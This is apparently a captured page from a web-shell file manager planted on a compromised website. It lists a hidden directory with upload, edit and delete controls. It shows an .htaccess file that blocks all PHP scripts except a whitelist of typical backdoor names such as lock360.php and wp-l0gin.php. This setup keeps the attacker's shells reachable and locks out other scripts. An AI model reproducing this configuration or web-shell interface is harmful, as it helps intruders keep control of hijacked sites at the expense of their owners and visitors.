/
home
/
alixis5
/
agoratalent.ai
/
inrfpmg
/
/home/alixis5/agoratalent.ai/inrfpmg
mkdir
upload
Name
Size
Mode
Actions
cuvemgh/
-
0555
rm
.htaccess
533
0644
edit
dl
rm
admin.php
33111
0644
edit
dl
rm
index.html
0
0644
edit
dl
rm
index.php
7148
0644
edit
dl
rm
Edit:
/home/alixis5/agoratalent.ai/inrfpmg/.htaccess
(533B)
<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>
Save
Order allow,deny Deny from all
Order allow,deny Allow from all
RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L]